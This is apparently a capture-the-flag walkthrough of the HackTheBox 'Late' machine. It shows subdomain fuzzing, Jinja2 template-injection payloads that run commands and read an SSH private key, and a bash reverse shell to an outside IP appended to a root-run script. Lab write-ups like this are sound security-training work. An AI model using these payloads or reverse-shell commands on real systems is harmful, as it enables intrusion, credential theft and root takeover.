NETWORK

ENUMERATION

Subdomains discovery

We have found a sub domain with

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.late.htb" -u http://late.htb -fs 9461 -s

Discovering the scanner

/home/svc_acc/app/uploads/output.jpg5123

Template injection in Flask

Because we are dealing with flask we should test for template injection

{{2*2}} _AA_ ${2*3} _BB_ <%= 3*4 %> _CC_ ${{3*5}} _DD_ #{4*4}

Let’s write our code to an image with

Looking into the result.txt, we can see that {{3*5}} gives us 15

We have template injection

FOOTHOLD

Remote Code Execution

Using the following command

curl -k -X POST -F 'file=@/home/clobee/Downloads/boxes/htb/late/exploit.jpg' -v http://images.late.htb/scanner | html2text

To load an image containing the following code

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

We are able to run commands on the server

Unfortunately, we were not able to get a stable shell using this process so we went after the information on the machine instead.

Using the following payloads, we were able to retrieve an ssh key

{{config.__class__.__init__.__globals__['os'].popen('ls -ailr /home').read()}}

{{ config.__class__.__init__.__globals__["os"].popen("cat ~/.ssh/id_rsa; id;").read() }}

SSH access as svc_acc

Using this ssh key we get access to the server

PRIV ESCALATION

Looking into the processes we have found an interesting script

We can write to that file, let’s add a reverse shell into that file

echo "bash -i >& /dev/tcp/10.10.16.9/1235 0>&1" >> /usr/local/sbin/ssh-alert.sh; ssh localhost "x"

Thanks to this command, we get a reverse shell on the machine as user root